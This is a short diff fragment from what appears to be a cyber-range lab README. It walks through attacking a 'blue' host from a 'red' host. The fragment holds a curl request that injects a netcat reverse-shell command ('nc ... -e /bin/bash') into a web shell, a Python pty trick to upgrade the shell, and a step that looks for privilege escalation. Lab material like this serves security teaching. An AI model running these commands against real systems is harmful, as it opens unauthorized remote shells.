MikeStorrs/cyber/README.md

 curl -X GET 'http://10.150.0.3/index.php?cmd=nc%20-nv%2010.150.0.2%204444%20-e%20/bin/bash'
 ```

-14. Now in the first `red-1` shell, you should have a reverse shell to `blue-35370`.
-Use this Python trick to get a tty and invoke bash.
+14. Now in the first `red-1` shell, you should have a connection to `blue-35370`.
+Use this Python trick to get a tty and invoke a Bourne shell.

 ```
 python -c 'import pty; pty.spawn("/bin/sh")'
 ```

-15. Create a virtualenv, install lem, and look for a privilege escalation vulnerability.
+15. Inside the new shell, Create a virtualenv, install lem, and look for a privilege escalation vulnerability.

 ```
 cd /tmp